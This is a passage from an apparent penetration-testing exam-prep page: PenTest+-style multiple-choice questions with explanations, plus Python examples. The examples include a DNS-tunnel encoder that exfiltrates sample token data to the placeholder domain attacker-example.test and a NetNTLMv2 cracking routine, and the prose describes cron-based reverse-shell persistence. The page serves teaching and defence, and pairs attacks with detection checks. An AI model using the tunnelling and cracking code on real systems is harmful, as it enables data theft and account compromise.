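    """Tester's loop from the question: stay logged in as one user, walk
    neighbouring ids, and report which ones return another user's data."""
    leaked = []
    for pid in id_range:
        try:
            profile = fetch(session_user, pid)
        except (Forbidden, KeyError):
            continue
        if profile.owner != session_user:
            leaked.append(pid)
    return leaked


if __name__ == "__main__":
    print("vulnerable endpoint leaks ids:", idor_probe("alice", range(1000, 1006), get_profile_vulnerable))
    print("fixed endpoint leaks ids:     ", idor_probe("alice", range(1000, 1006), get_profile_fixed))
```

The probe is also the regression test to keep: run it against every endpoint that takes an object id, with a low-privileged session, and fail the build if the leaked list is ever non-empty.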

14
MCQ · hard

Refer to the exhibit. The firewall rules shown are in effect. A tester has compromised a host at 192.168.1.100 and wants to exfiltrate data to an external server. Which technique will most likely succeed?

A.Use DNS tunneling to an external DNS server
B.Send data over HTTPS to an external server
C.Exfiltrate via HTTP to an external server
D.Initiate an RDP connection to the external server
Answer: B

Outbound HTTPS to any destination is allowed, making this the best choice.

Why this answer

Option B is correct because HTTPS (TCP/443) is almost always permitted outbound for ordinary web browsing, and unless the perimeter performs TLS interception the payload is opaque to content inspection. The compromised host at 192.168.1.100 can initiate an outbound HTTPS connection to a server the tester controls, so exfiltration over HTTPS is the option most likely to succeed given the firewall rules.

Exam trap

The trap here is that candidates may assume DNS tunneling is stealthy because it uses a common protocol, but they overlook that firewalls often allow HTTPS by default while DNS traffic is more closely monitored for anomalies.

How to eliminate wrong answers

Option A is wrong because DNS tunneling relies on UDP/53 traffic, which is often monitored for anomalous query patterns or blocked by security controls like DNS sinkholing or rate limiting, making it less reliable than HTTPS. Option C is wrong because HTTP (TCP/80) is frequently inspected or blocked by modern firewalls and proxies, and unencrypted traffic can be easily detected or filtered. Option D is wrong because RDP (TCP/3389) is a remote management protocol that is typically blocked at the perimeter firewall to prevent unauthorized remote access, and it is not designed for stealthy data exfiltration.

15
MCQ · medium

A penetration tester has compromised a Linux web server via a remote file inclusion vulnerability. The tester wants to maintain persistent access on the system. Which technique is MOST reliable for persistence on a Linux system?

A.Adding a cron job to run a reverse shell every minute
B.Creating a local user account with UID 0
C.Modifying the sudoers file to grant the tester sudo access
D.Installing a kernel module rootkit
Answer: A

Cron jobs are simple, reliable, and persist across reboots.

Why this answer

A cron job is the most reliable persistence mechanism because it operates independently of user login sessions, runs with root privileges if configured in the root crontab, and can execute a reverse shell at a fixed interval (e.g., every minute). Unlike user accounts or sudoers modifications, a cron job does not require the attacker to maintain an active session or rely on system services that may be monitored or disabled.

Exam trap

The trap here is that candidates may assume creating a root-equivalent user (UID 0) is stealthy, but in practice it is easily detected by auditing tools and log reviews, whereas a cron job blends in with normal system activity and provides automated, recurring access.

How to eliminate wrong answers

Option B is wrong because creating a local user account with UID 0 (root) is highly visible in /etc/passwd and /etc/shadow, and many security tools and system administrators actively monitor for unauthorized UID 0 accounts. Option C is wrong because modifying the sudoers file grants sudo access but does not provide persistence; the tester would still need an active session or another way back in if the current session is lost. Option D is wrong because a kernel module rootkit is the stealthiest option in theory but the least reliable in practice: it must be built for the exact running kernel, module signature enforcement or Secure Boot may refuse to load it, and a bug panics the host and ends the engagement.

16
Multi-Select · hard

A penetration tester is assessing a wireless network's security. The tester wants to capture WPA2 handshakes for offline password cracking. Which two attacks can be used to force a client to re-authenticate and capture the handshake? (Choose TWO.)

Select 2 answers
A.Rogue DHCP server attack
B.ARP poisoning attack
C.Evil twin attack
D.Disassociation attack
E.Deauthentication attack
Answers: D, E

Disassociation frames also disconnect clients, prompting reconnection and handshake capture.

Why this answer

A deauthentication attack (Option E) injects deauthentication management frames spoofed with the access point's BSSID, forcing the client to drop and re-establish its association and therefore perform a fresh WPA2 4-way handshake that the tester captures. A disassociation attack (Option D) does the same with disassociation frames. Both work because 802.11 management frames are unauthenticated unless Protected Management Frames (802.11w) is enforced; where it is, the station ignores forged frames and this approach fails.

Exam trap

CompTIA often tests the distinction between deauthentication and disassociation attacks as both valid methods, while candidates may mistakenly think only one is correct or confuse them with ARP poisoning or evil twin attacks.

17
MCQ · medium

A penetration tester has gained initial access to a Linux server through a vulnerable web application. The server has a restrictive outbound firewall that only allows traffic on ports 80, 443, and 53. The tester wants to establish a reverse shell that is likely to bypass the firewall. Which of the following techniques would be most effective?

A.Use a reverse shell listener on TCP port 3389 and connect from the target
B.Use a bind shell on the target's port 4444 and connect directly
C.Use a reverse shell over DNS by encoding commands in DNS queries
D.Use a reverse shell on TCP port 8080 and hope it is not blocked
Answer: C

DNS traffic (UDP 53) is often allowed outbound for name resolution. Tools like dnscat2 can encapsulate data in DNS packets, enabling a reverse shell that can bypass the firewall.

Why this answer

Option C is correct because DNS traffic on port 53 is typically allowed through restrictive outbound firewalls, and encoding reverse shell commands within DNS queries allows the tester to tunnel traffic over DNS, bypassing the firewall's port restrictions. Tools like dnscat2 or iodine can encapsulate TCP data in DNS requests, making the reverse shell appear as legitimate DNS traffic.

Exam trap

The trap here is that candidates may assume a reverse shell on a familiar service port such as 3389 will work, but the firewall's explicit allow list (80, 443, 53) blocks every other destination port. Among the options given, only DNS tunneling rides on an allowed protocol; a reverse shell that connects out to TCP/443 would also pass this firewall, but no option offers one.

How to eliminate wrong answers

Option A is wrong because TCP port 3389 (RDP) is not in the outbound allow list, so the target's connection attempt to the tester's listener is dropped regardless of what is listening there. Option B is wrong because a bind shell waits for the tester to connect inbound to port 4444 on the target; the question describes only the outbound policy, and an inbound connection to an arbitrary high port on an internal server is almost always blocked by the perimeter firewall or simply unreachable through NAT, so the tester never reaches that listener. Option D is wrong because 8080 is not on the allow list either, and a plan that relies on hoping a port is open is not a technique.

18
MCQ · hard

A penetration tester has gained a foothold on a Linux server through a vulnerable web application. The server has an outbound firewall that blocks all traffic except DNS queries (UDP 53). The tester needs to establish a reverse shell to maintain access. Which technique is most likely to succeed?

A.Use a bind shell on a high TCP port and connect from the tester's machine
B.Encode the payload in Base64 and use DNS tunneling to execute commands
C.Attempt a reverse shell over HTTP using TCP port 80
D.Use SSH reverse port forwarding to the tester's server on port 443
Answer: B

DNS tunneling can encode arbitrary data within DNS queries, which are allowed through the firewall, and can be used to establish a two-way communication channel, enabling a reverse shell.

Why this answer

Option B is correct because DNS tunneling encapsulates non-DNS traffic (e.g., command output) within DNS query and response packets, which are allowed through the firewall on UDP port 53. This technique bypasses the outbound firewall restriction by making the malicious traffic appear as legitimate DNS queries, enabling the tester to execute commands and exfiltrate data without triggering network-level blocks.

Exam trap

The trap here is that candidates assume a reverse shell over HTTP (TCP 80) will work because HTTP is commonly allowed, but the question explicitly states the firewall blocks all traffic except DNS queries (UDP 53), making TCP-based reverse shells fail regardless of the port.

How to eliminate wrong answers

Option A is wrong because a bind shell opens a listening port on the target server, but the firewall blocks all traffic except DNS queries, so the tester's inbound connection to that high TCP port is dropped. Option C is wrong because a reverse shell over HTTP using TCP port 80 requires the target to initiate an outbound TCP connection, and the firewall permits only UDP 53, so the TCP SYN is dropped. Option D is wrong for the same reason: SSH reverse port forwarding is an outbound TCP connection (to port 443 in this case), and no TCP traffic leaves the host.
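Worked example (added here; not from the original page), covering questions 17 and 18. The Python below is the encoding half of a DNS tunnel: it packs data into query names under a domain the tester controls (t.attacker-example.test is a placeholder), respecting the 63-octet label and 253-character name limits, and the server side reorders and decodes them. The return channel (commands carried back in TXT or CNAME answers) is omitted; dnscat2 and iodine implement both directions. A small detector heuristic shows why question 14's explanation calls this channel less reliable than HTTPS. The sample data is constructed.

```python
import base64

MAX_LABEL = 63                    # RFC 1035: a label is at most 63 octets
MAX_NAME = 253                    # practical limit for a textual name
SEQ_WIDTH = 4                     # zero-padded sequence number label
PAYLOAD_CHARS = 2 * MAX_LABEL     # two payload labels per query (~78 raw bytes)


def encode_queries(data: bytes, domain: str):
    """Client side: turn data into query names such as
    0000.<label>.<label>.t.attacker-example.test. Base32 is used because DNS
    names are case-insensitive and resolvers may fold case on the way."""
    text = base64.b32encode(data).decode("ascii").rstrip("=").lower()
    names = []
    for seq, start in enumerate(range(0, len(text), PAYLOAD_CHARS)):
        chunk = text[start:start + PAYLOAD_CHARS]
        labels = [chunk[i:i + MAX_LABEL] for i in range(0, len(chunk), MAX_LABEL)]
        name = ".".join([f"{seq:0{SEQ_WIDTH}d}", *labels, domain])
        if len(name) > MAX_NAME:
            raise ValueError("domain too long for this chunk size")
        names.append(name)
    return names


def decode_queries(names, domain: str) -> bytes:
    """Server side (the authoritative name server the tester controls): strip
    the domain, order by sequence number (UDP may reorder), rejoin and decode."""
    suffix = "." + domain
    chunks = {}
    for name in names:
        if not name.endswith(suffix):
            continue                            # unrelated query, ignore
        labels = name[:-len(suffix)].split(".")
        chunks[int(labels[0])] = "".join(labels[1:])
    text = "".join(chunks[k] for k in sorted(chunks)).upper()
    text += "=" * (-len(text) % 8)
    return base64.b32decode(text)


def looks_like_tunnel(name: str) -> bool:
    """Defender's heuristic, the kind of check that makes DNS exfiltration less
    reliable than HTTPS: tunnelled names have long, high-entropy labels and far
    more characters than ordinary hostnames."""
    labels = name.split(".")
    longest = max(len(label) for label in labels)
    distinct = len(set(name.replace(".", "")))
    return longest > 30 or len(name) > 100 or (distinct > 20 and len(name) > 50)


# Constructed sample: a few lines of the kind a tester would pull off a host.
SAMPLE = b"hostname=web01\nuid=33(www-data)\ntoken=7f3e9b2c4d1a8e5f\n" * 3


if __name__ == "__main__":
    queries = encode_queries(SAMPLE, "t.attacker-example.test")
    for q in queries:
        print(len(q), looks_like_tunnel(q), q)
    print(decode_queries(queries, "t.attacker-example.test") == SAMPLE)
```

Each name in the output is what a recursive resolver would forward to the tester's authoritative server; with 4-digit sequence numbers the scheme carries up to 10,000 queries (roughly 780 KB) per session before the counter must be widened.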

19
MCQ · easy

A penetration tester is performing a client-side attack against a user. The tester sends an email with a malicious attachment that, when opened, executes a macro that downloads a payload. Which type of attack is this?

A.Spear phishing
B.Vishing
C.Smishing
D.Watering hole
Answer: A

This is the correct answer because the attack targets a specific user via email with a malicious attachment, which is the definition of spear phishing.

Why this answer

Spear phishing is a targeted phishing attack where the attacker crafts a personalized email to a specific individual or organization, often including a malicious attachment. In this scenario, the email with a macro-enabled attachment that downloads a payload is a classic spear phishing technique, as it exploits human trust and social engineering to deliver malware. This contrasts with generic phishing, which casts a wide net, and the client-side attack vector relies on the user executing the macro.

Exam trap

The trap here is that candidates confuse spear phishing with generic phishing or social engineering categories like vishing/smishing, but the key differentiator is the use of a personalized email with a malicious attachment, not the delivery medium (voice or SMS).

How to eliminate wrong answers

Option B (Vishing) is wrong because vishing (voice phishing) uses telephone calls or voice messages to trick victims into revealing sensitive information, not email attachments with macros. Option C (Smishing) is wrong because smishing (SMS phishing) uses text messages to deliver malicious links or requests, not email attachments with macros. Option D (Watering hole) is wrong because that attack compromises a website the target population already visits and waits for them to arrive; nothing is delivered by email.

20
MCQ · easy

A penetration tester has physical access to a small office. The network switch is in a locked cabinet, but the tester notices the lock is broken. The switch has multiple ports, and the tester wants to connect to the internal network. The tester has a laptop with an Ethernet port. However, the tester suspects that port security is enabled on the switch ports, which would block the connection if the MAC address is not authorized. Which action should the tester take first to gain network access?

A.Perform a MAC flooding attack to fill the switch's MAC table.
B.Use a DHCP starvation attack to exhaust IP addresses.
C.Plug the laptop into an available switch port.
D.Connect to the switch's console port and attempt default credentials.
AnswerD

If successful, the tester can disable port security or add their MAC address as authorized, gaining network access.

Why this answer

Option D is correct because the tester has physical access to the switch and the lock is broken, allowing direct console access. If port security is enabled, plugging into a data port (Option C) would be blocked. The fastest first step is to connect to the console port and try default credentials (e.g., cisco/cisco) to gain administrative control of the switch, which can then be used to disable port security or add the tester's MAC address to the allowed list.

Exam trap

The trap here is that candidates assume physical access to a switch port means they can simply plug in (Option C), but Cisco exams emphasize that port security is a common Layer 2 control that must be bypassed via management access first, not by attacking the data plane.

How to eliminate wrong answers

Option A is wrong because a MAC flooding attack aims to overflow the switch's CAM table so that it floods unicast traffic out all ports like a hub, but it does not bypass port security; a burst of unknown source MAC addresses is exactly what port security counts as a violation, so the port is err-disabled or blocked and the attempt is logged. Option B is wrong because a DHCP starvation attack exhausts the DHCP pool to cause a denial of service or push clients toward a rogue DHCP server; it does not grant the tester link access through a port-secured switch port. Option C is wrong because if port security is enabled with a MAC address allow list, plugging directly into an available port triggers a security violation (shutdown, restrict, or protect mode), blocking the connection immediately and, in shutdown or restrict mode, generating a syslog message or SNMP trap that can alert the administrator. Spoofing an allowed MAC address would work, but the tester does not yet know one, which is why console access comes first.

21
MCQmedium

A penetration tester has gained access to a Windows workstation and extracted NTLM password hashes. The tester wants to move laterally to a server that authenticates using NTLM. The tester does not have the plaintext passwords. Which technique is MOST appropriate to authenticate to the server using the captured hashes?

A.Pass-the-hash
B.Brute force
C.Rainbow tables
D.Keylogging
AnswerA

Pass-the-hash uses the captured NTLM hash to authenticate to remote services without needing the plaintext password.

Why this answer

Pass-the-hash (PtH) is the correct technique because it authenticates to the remote server with the captured NT hash directly, without the plaintext password. In NTLM challenge-response, the NT hash (MD4 of the UTF-16LE password) is the key used to compute the response to the server's challenge; the password itself is never sent and is only ever used to derive that hash, so whoever holds the hash can produce a valid response. This is a well-known lateral movement technique in Windows environments, executed with tools such as Mimikatz (sekurlsa::pth) or Impacket's wmiexec.py and psexec.py with the -hashes option. It fails where NTLM is disabled or the account is a member of Protected Users, which forces Kerberos.

Exam trap

The trap here is that candidates may think they need the plaintext password for authentication and choose brute force or rainbow tables, not realizing that NTLM authentication accepts the hash directly in the challenge-response exchange, making pass-the-hash the most efficient lateral movement technique.

How to eliminate wrong answers

Option B (Brute force) is wrong because brute force guesses the plaintext password by trying many combinations, which is slow and unnecessary: the tester already holds the hash, which is all NTLM authentication needs. Option C (Rainbow tables) is wrong because they are precomputed tables used to reverse a hash to a plaintext password; NT hashes are unsalted, so a rainbow table can work against them, but recovering the plaintext is pointless when the hash itself authenticates. Option D (Keylogging) is wrong because it captures keystrokes to obtain a password as the user types it; it requires waiting for a future interactive logon and makes no use of the hashes already in hand.

22
MCQmedium

A penetration tester has captured NTLM hashes from a compromised machine and wants to move laterally to a server that requires NTLM authentication. The tester does not have the plaintext password. Which attack technique is MOST appropriate for authenticating using the captured hashes?

A.Brute force the password from the hash
B.Pass-the-hash
C.NTLM relay
D.Kerberoasting
AnswerB

Pass-the-hash uses the NTLM hash to authenticate without needing the plaintext password, enabling lateral movement.

Why this answer

Pass-the-hash (PtH) is the most appropriate technique because it authenticates to the target server using the captured NT hash directly, without the plaintext password. In NTLM, the NT hash is the key that computes the challenge response, so an attacker holding the hash can answer any challenge the server issues. This is a well-known lateral movement technique in Windows environments; the hashes must be NT hashes (from LSASS, the SAM, or NTDS.dit), not NetNTLM challenge-response captures.

Exam trap

CompTIA often tests the distinction between pass-the-hash and NTLM relay, where candidates confuse the need for an active relay target versus simply using a captured hash to authenticate directly.

How to eliminate wrong answers

Option A is wrong because brute-forcing the password from the hash is computationally expensive and slow, especially for strong passwords, and is unnecessary when the hash itself can authenticate. Option C is wrong because NTLM relay forwards a victim's live authentication attempt to a target server; it needs an incoming connection from another machine at that moment and does not use a previously captured hash. Option D is wrong because Kerberoasting requests Kerberos service tickets for accounts with SPNs and cracks them offline to recover service-account passwords; it is a Kerberos credential-theft technique, not a way to authenticate with NTLM hashes already in hand.

23
MCQmedium

During a web application penetration test, a tester identifies a potential SQL injection vulnerability in a search field. The tester wants to extract data from the database without generating error messages that could trigger an alert. Which technique is most appropriate?

A.In-band SQL injection
B.Error-based SQL injection
C.Blind SQL injection (time-based)
D.Union-based SQL injection
AnswerC

Time-based blind injection uses time delays to infer data without generating errors, making it stealthy.

Why this answer

Option C is correct because blind SQL injection (time-based) extracts data without visible error messages or query output. Using conditional delays (for example, IF (condition) WAITFOR DELAY '0:0:5' in SQL Server, SLEEP(5) in MySQL, or pg_sleep(5) in PostgreSQL), the tester infers one true/false answer per request from the response time and reconstructs data a bit or a character at a time. Nothing in the response body changes, so the error-based signatures a WAF or IDS watches for are not triggered; the cost is many slow requests, which is itself detectable as a timing or volume anomaly.

Exam trap

The trap here is that candidates often choose error-based or union-based injection because they are more familiar, failing to recognize that the question explicitly requires avoiding error messages and alerts, which, of the options listed, only time-based blind injection achieves (boolean-based blind injection also avoids errors but is not offered).

How to eliminate wrong answers

Option A is wrong because in-band SQL injection relies on the same channel to both inject and retrieve data (e.g., via UNION or error messages), which would produce visible output or errors that could trigger alerts. Option B is wrong because error-based SQL injection deliberately forces database errors to extract information from error messages, directly generating alerts. Option D is wrong because union-based SQL injection requires the attacker to see the results of a UNION query in the application response, which would expose the attack and potentially trigger monitoring systems.

24
MCQeasy

A penetration tester is planning a social engineering campaign against a corporation. The goal is to trick the CEO into revealing sensitive information. Which type of attack should the tester use?

A.Vishing
B.Spear phishing
C.Pharming
D.Whaling
AnswerD

Whaling is a form of spear phishing that targets senior executives such as CEOs, making it the correct choice for this scenario.

Why this answer

Whaling is a targeted form of phishing that specifically focuses on high-profile individuals, such as the CEO. In this scenario, the goal is to trick the CEO into revealing sensitive information, making whaling the correct choice because it is designed to impersonate trusted entities or create urgent scenarios to deceive senior executives.

Exam trap

CompTIA often tests the distinction between spear phishing and whaling, where the trap is that candidates choose spear phishing because it is a broader term, but the question's focus on a CEO specifically requires the more precise 'whaling' classification.

How to eliminate wrong answers

Option A is wrong because vishing (voice phishing) is defined by its medium, phone calls or voice messages; a call could be aimed at a CEO, but the question asks for the attack type defined by its target, and that is whaling. Option B is wrong because spear phishing targets specific individuals or groups but is not reserved for senior executives; whaling is the more precise term for targeting C-suite personnel. Option C is wrong because pharming redirects users from legitimate websites to fraudulent ones by manipulating DNS or the local hosts file, and it does not involve directly tricking an individual via email or messaging.

25
MCQmedium

A penetration tester is exploiting a web application that stores session tokens in HTTP cookies without the HttpOnly flag. Which attack is most likely to succeed?

A.SQL injection
B.Session hijacking through cross-site scripting
C.Cross-site request forgery
D.Server-side request forgery
AnswerB

XSS can read cookie values if HttpOnly is not set, allowing session theft.

Why this answer

The absence of the HttpOnly flag on session cookies allows client-side scripts (e.g., JavaScript via document.cookie) to read the cookie. An attacker can exploit a cross-site scripting (XSS) vulnerability to execute arbitrary JavaScript in the victim's browser, which reads the session cookie and sends it to the attacker. This enables session hijacking without guessing or brute-forcing the token. Note that HttpOnly only stops scripts from reading the cookie; an XSS payload can still issue authenticated requests from the victim's browser, so the flag limits the damage rather than removing the XSS.

Exam trap

The trap here is that candidates often confuse session hijacking via XSS with CSRF, but CSRF does not steal the token—it only abuses the existing authenticated session to perform actions.

How to eliminate wrong answers

Option A is wrong because SQL injection targets the database layer by manipulating SQL queries, not the client-side storage of session tokens. Option C is wrong because cross-site request forgery (CSRF) forces the victim to perform unintended actions using their existing session, but it does not steal the session token itself. Option D is wrong because server-side request forgery (SSRF) tricks the server into making internal requests, not stealing client-side cookies.

26
MCQmedium

Refer to the exhibit. A penetration tester performed a port scan and collected the information shown. Which vulnerability is most likely present based on the software versions?

A.Sendmail remote code execution
B.OpenSSH user enumeration
C.Apache HTTP Server directory traversal
D.PHP CGI argument injection (CVE-2019-11043)
AnswerD

PHP 7.3.9 is within the range affected by CVE-2019-11043, which allows remote code execution against PHP-FPM via specially crafted request paths.

Why this answer

The exhibit shows Apache/2.4.39 with PHP 7.3.9. PHP 7.3.9 falls in the range affected by CVE-2019-11043 (PHP 7.1.x before 7.1.33, 7.2.x before 7.2.24 and 7.3.x before 7.3.11), a buffer underflow in PHP-FPM's handling of PATH_INFO that can be turned into remote code execution with a crafted URL. The option label calls it 'PHP CGI argument injection'; strictly, that name belongs to the older php-cgi flaw CVE-2012-1823, while CVE-2019-11043 is the PHP-FPM path-handling bug, but the version numbers point to the latter. The public exploit targets a common nginx configuration (fastcgi_split_path_info with a PATH_INFO fastcgi_param); whether an Apache front end proxying to PHP-FPM is exploitable depends on how it sets PATH_INFO, so the version match makes this the most likely finding, not a confirmed one.

Exam trap

The trap here is that candidates see 'Apache' and 'PHP' and immediately think of directory traversal (Option C), but the specific version numbers (Apache 2.4.39, PHP 7.3.9) are the key to identifying the PHP CGI argument injection vulnerability, not a generic Apache flaw.

How to eliminate wrong answers

Option A is wrong because Sendmail remote code execution flaws belong to old Sendmail releases and are indicated by an SMTP banner on port 25, not by Apache or PHP version strings. Option B is wrong because OpenSSH user enumeration (CVE-2018-15473 and related timing-based variants) is identified from the SSH banner on port 22, not from HTTP server headers. Option C is wrong because the well-known Apache HTTP Server path traversal is CVE-2021-41773 in 2.4.49, with its incomplete fix CVE-2021-42013 in 2.4.50; 2.4.39, the version shown, is not affected.

27
MCQeasy

Refer to the exhibit. A penetration tester sends the request and receives the response shown. Which vulnerability is confirmed?

A.Server-side request forgery
B.Cross-site request forgery
C.SQL injection
D.Reflected cross-site scripting
AnswerD

The input is echoed back in the HTML without sanitization, allowing script execution.

Why this answer

The response includes the parameter value 'John' reflected directly in the HTML body without sanitization or encoding, and the request uses an HTTP GET method. This confirms a reflected cross-site scripting (XSS) vulnerability, as the tester can inject arbitrary JavaScript by modifying the 'name' parameter, which will execute in the victim's browser.

Exam trap

The trap here is that candidates may confuse reflected XSS with stored XSS or CSRF, but the key indicator is that the input appears only in the response to that specific request (reflected), not stored on the server, and the GET method with no state change rules out CSRF.

How to eliminate wrong answers

Option A is wrong because server-side request forgery (SSRF) involves the server making requests to internal resources based on user input, but the response shows the input reflected in the page, not evidence of a server-side request. Option B is wrong because cross-site request forgery (CSRF) needs a state-changing request the victim is tricked into sending; the request shown is a simple GET that only echoes a parameter, and nothing indicates an action performed on the victim's behalf. Option C is wrong because SQL injection would manifest as database errors or altered query results; the response simply echoes 'John', and nothing suggests the parameter reaches a database query.

28
MCQmedium

A penetration tester needs to escalate privileges on a Linux target after gaining initial shell access. The /etc/passwd file shows a user 'jake' with UID 0. What does this indicate?

A.The user 'jake' is a normal user with UID misconfiguration
B.The user 'jake' is a member of the root group
C.The user 'jake' has the same privileges as root
D.There is a duplicate user 'jake' and 'root'
AnswerC

A UID of 0 means the account is the superuser, regardless of username.

Why this answer

In Linux, the kernel grants superuser privileges to any process whose UID is 0; 'root' is simply the conventional name for that account. When /etc/passwd shows a user 'jake' with UID 0, logging in as jake yields a process with UID 0 (id -u prints 0), and the kernel makes permission decisions on the UID, not the username.

Therefore, 'jake' has full root-level access, making option C correct.

Exam trap

The trap here is that candidates confuse UID 0 with group membership (GID 0) or assume it's a misconfiguration, when in fact the UID field in /etc/passwd directly determines superuser status, not the username or group.

How to eliminate wrong answers

Option A is wrong because a UID of 0 is not a misconfiguration of a normal user; it is the superuser identifier by long-standing Unix convention, so 'jake' has root privileges. Option B is wrong because group membership (e.g., being in the root group with GID 0) does not grant root privileges; only UID 0 confers superuser authority, and the third field of the /etc/passwd entry is the UID, not the group. Option D is wrong because there is no duplicate user; 'jake' and 'root' are separate usernames that share UID 0, meaning they share the same superuser identity. That is not a duplicate account but a security finding, and it is often a backdoor left by a previous intruder.
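The check behind question 28, as an added example (not part of the original page): parse /etc/passwd, list every UID-0 account, and separate that from accounts that merely carry GID 0. The file content is constructed; the account names are hypothetical.

```python
"""Audit /etc/passwd for extra superuser accounts (the question 28 finding) and
keep the UID-0 / GID-0 distinction straight. Added example; the file content
below is constructed and the account names are hypothetical."""

SAMPLE_PASSWD = """\
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
jake:x:0:1001:Jake:/home/jake:/bin/bash
ops:x:1002:0:Ops:/home/ops:/bin/bash
alice:x:1003:1003:Alice:/home/alice:/bin/bash
bob::1004:1004:Bob:/home/bob:/bin/bash
"""


def parse_passwd(text: str) -> list:
    """Split each passwd line into its seven colon-separated fields."""
    entries = []
    for line in text.splitlines():
        if not line or line.startswith("#"):
            continue
        name, pw, uid, gid, gecos, home, shell = line.split(":", 6)
        entries.append({"name": name, "pw": pw, "uid": int(uid), "gid": int(gid), "shell": shell})
    return entries


def audit_passwd(text: str) -> dict:
    """Findings a privilege-escalation enumeration (or a defender's baseline check) wants."""
    entries = parse_passwd(text)
    by_uid = {}
    for e in entries:
        by_uid.setdefault(e["uid"], []).append(e["name"])
    return {
        # the kernel grants superuser privileges on UID 0, whatever the name
        "superusers": [e["name"] for e in entries if e["uid"] == 0],
        "extra_superusers": [e["name"] for e in entries if e["uid"] == 0 and e["name"] != "root"],
        # GID 0 alone is root-group membership, not superuser authority
        "root_group_only": [e["name"] for e in entries if e["gid"] == 0 and e["uid"] != 0],
        # two names on one UID share one identity (the 'jake'/'root' case)
        "duplicate_uids": {uid: names for uid, names in by_uid.items() if len(names) > 1},
        # empty password field: no password is required for that account
        "empty_password": [e["name"] for e in entries if e["pw"] == ""],
    }


if __name__ == "__main__":
    for finding, value in audit_passwd(SAMPLE_PASSWD).items():
        print(f"{finding}: {value}")
```

On a live target the same result comes from `awk -F: '$3 == 0' /etc/passwd`; the function above is the same test with the duplicate-UID and GID-0 distinctions the explanation draws.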

29
MCQmedium

During an internal penetration test, a tester captures a NetNTLMv2 hash via an SMB relay attack. The target network does not enforce SMB signing. What is the most effective next step to gain access to a remote server?

A.Crack the hash offline using a dictionary attack.
B.Relay the captured hash to authenticate to another server.
C.Perform a pass-the-hash attack using the captured hash.
D.Use the hash to perform an LLMNR poisoning attack.
AnswerB

Without SMB signing, the NetNTLMv2 hash can be relayed to obtain authenticated access to other systems on the network.

Why this answer

Since SMB signing is not enforced, the tester can relay the NetNTLMv2 authentication to another server without cracking anything. A relay tool such as Impacket's ntlmrelayx sits in the middle of a live authentication: it takes the target server's challenge, hands it to the victim client, and forwards the client's NetNTLMv2 response to the target, which accepts it because the response was computed over its own challenge. The captured hash therefore has to be relayed while the victim's authentication is in flight; a response saved earlier cannot be replayed against a fresh challenge. This is the most effective step because it yields authenticated access (and, for a local administrator, code execution) immediately, without the time and resource cost of offline cracking.

Exam trap

The trap here is that candidates often confuse NetNTLMv2 with NTLM hashes, assuming pass-the-hash works with any hash type, when in fact pass-the-hash requires the raw NTLM hash (from LSASS or a dump) and not the challenge-response variant captured via relay.

How to eliminate wrong answers

Option A is wrong because offline cracking of NetNTLMv2 is slow for strong passwords and may never succeed, making it less effective than relaying when SMB signing is disabled; it remains the fallback when signing blocks relay. Option C is wrong because pass-the-hash requires the NT hash itself; NetNTLMv2 is a challenge-response value derived from the NT hash and bound to one server challenge, so it cannot be used in a pass-the-hash attack. Option D is wrong because LLMNR poisoning is a technique to capture hashes, not a method to use an already-captured hash for authentication; the hash has already been obtained, so further poisoning is unnecessary.
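The point shared by questions 21, 22 and 29, shown in code as an added example (not from the page): the NT hash, not the password, is the key material in NTLM, so a client holding only the hash produces a valid response (pass-the-hash), while a captured NetNTLMv2 response is bound to one server challenge and can only be relayed live or cracked offline. The user, domain, challenges and the simplified blob are constructed values; MD4 is implemented inline because hashlib's md4 is often unavailable on OpenSSL 3 builds.

```python
"""NT hash vs. NetNTLMv2 response: why pass-the-hash works and why a captured
challenge-response cannot simply be replayed. Added example; all names,
challenges and the simplified blob are constructed, not from any real system."""
import hashlib
import hmac
import struct

MASK = 0xFFFFFFFF


def _rotl(x, n):
    return ((x << n) | (x >> (32 - n))) & MASK


def md4(data: bytes) -> bytes:
    """Pure-Python MD4 (RFC 1320); hashlib.new('md4') is frequently disabled on OpenSSL 3."""
    msg = bytearray(data) + b"\x80"
    while len(msg) % 64 != 56:
        msg += b"\x00"
    msg += struct.pack("<Q", len(data) * 8)
    state = [0x67452301, 0xEFCDAB89, 0x98BADCFE, 0x10325476]
    f = lambda x, y, z: (x & y) | (~x & z)
    g = lambda x, y, z: (x & y) | (x & z) | (y & z)
    h = lambda x, y, z: x ^ y ^ z
    rounds = (
        (f, 0x00000000, range(16), (3, 7, 11, 19)),
        (g, 0x5A827999, (0, 4, 8, 12, 1, 5, 9, 13, 2, 6, 10, 14, 3, 7, 11, 15), (3, 5, 9, 13)),
        (h, 0x6ED9EBA1, (0, 8, 4, 12, 2, 10, 6, 14, 1, 9, 5, 13, 3, 11, 7, 15), (3, 9, 11, 15)),
    )
    for off in range(0, len(msg), 64):
        x = struct.unpack("<16I", msg[off:off + 64])
        r = state[:]
        for fn, const, order, shifts in rounds:
            for i, k in enumerate(order):
                r[0] = _rotl((r[0] + fn(r[1], r[2], r[3]) + x[k] + const) & MASK, shifts[i % 4])
                r = [r[3], r[0], r[1], r[2]]  # rotate registers: A B C D -> D A B C
        state = [(s + v) & MASK for s, v in zip(state, r)]
    return struct.pack("<4I", *state)


def nt_hash(password: str) -> bytes:
    """NT hash = MD4(UTF-16LE(password)); unsalted, so identical wherever the password is reused."""
    return md4(password.encode("utf-16-le"))


def ntlmv2_response(nt: bytes, user: str, domain: str, server_challenge: bytes, blob: bytes) -> bytes:
    """NTLMv2 per MS-NLMP 3.3.2: the NT hash, not the password, is the key material."""
    response_key = hmac.new(nt, (user.upper() + domain).encode("utf-16-le"), hashlib.md5).digest()
    nt_proof = hmac.new(response_key, server_challenge + blob, hashlib.md5).digest()
    return nt_proof + blob  # NtChallengeResponse = NTProofStr || temp (the blob)


def server_verify(stored_nt: bytes, user: str, domain: str, server_challenge: bytes, response: bytes) -> bool:
    """What the SAM/DC does: recompute from the stored NT hash and compare."""
    expected = ntlmv2_response(stored_nt, user, domain, server_challenge, response[16:])
    return hmac.compare_digest(expected, response)


def crack_netntlmv2(user, domain, server_challenge, response, wordlist):
    """Offline attack on a captured NetNTLMv2 (what hashcat mode 5600 does, one candidate at a time)."""
    for candidate in wordlist:
        if server_verify(nt_hash(candidate), user, domain, server_challenge, response):
            return candidate
    return None


# Constructed scenario values.
USER, DOMAIN, PASSWORD = "alice", "CORP", "password"
# Simplified 'temp' blob: version, reserved, timestamp, client challenge, reserved.
# A real one also carries AV_PAIRs (target name, channel-binding hash, ...).
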